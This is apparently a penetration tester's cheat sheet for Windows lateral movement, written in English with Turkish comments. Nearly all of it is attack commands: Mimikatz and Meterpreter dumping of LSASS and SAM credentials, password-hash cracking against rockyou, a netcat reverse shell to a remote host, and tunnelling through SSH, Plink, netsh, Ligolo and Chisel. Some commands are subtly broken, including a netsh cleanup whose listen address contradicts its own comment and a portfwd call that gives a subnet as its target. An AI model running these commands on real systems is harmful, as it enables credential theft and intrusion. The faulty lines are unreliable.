Windows Lateral Movement

Mimikatz

Link: https://github.com/ParrotSec/mimikatz

.\mimikatz.exe
privilege::debug # Yetki kontrolü
token::elevate # Yetki yükseltme

lsadump::sam # Local Kullanıcı Hashleri
lsadump::secrets
sekurlsa::logonpasswords
sekurlsa::tickets

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Hash Dumping

impacket-secretsdump -sam sam -system system local

migrate -N lsass.exe
hashdump

load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets

john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

keepass2john Database.kdbx > hash.txt
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

Port Forwarding

# Local
systemctl start ssh
mousepad /etc/proxychains4.conf
# /etc/proxychains4.conf entry: socks5 127.0.0.1 9999

# SSH Tunneling
ssh -N -R 9999 root@192.168.1.2
proxychains nmap -v -sT -Pn -n 172.168.1.3

# Plink Tunnel
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.1.2 1234
C:\Windows\Temp\plink.exe -ssh -l root -pw root -R 127.0.0.1:3390:127.0.0.1:3389 192.168.1.3
nmap -sT -p 3390 127.0.0.1


# Netsh Tunnel (Local Admin Gerekir)
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.1.3 connectport=22 connectaddress=10.0.0.4
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.1.3 localport=2222 action=allow
ssh database_admin@192.168.1.3 -p 2222
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
# listenaddress must match the one used in the add command above (192.168.1.3); otherwise the portproxy entry is not removed and stays active after cleanup
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

# Meterpreter
portfwd add -l 1234 -p 80 -r 10.0.0.1/24

# Ligolo
./proxy -selfcert -laddr 0.0.0.0:443 
./agent.exe -ignore-cert -connect 192.168.1.2:443

# Chisel
./chisel.exe server --port 9999 --reverse
./chisel client 192.168.1.3:9999 R:8000:127.0.0.1:80
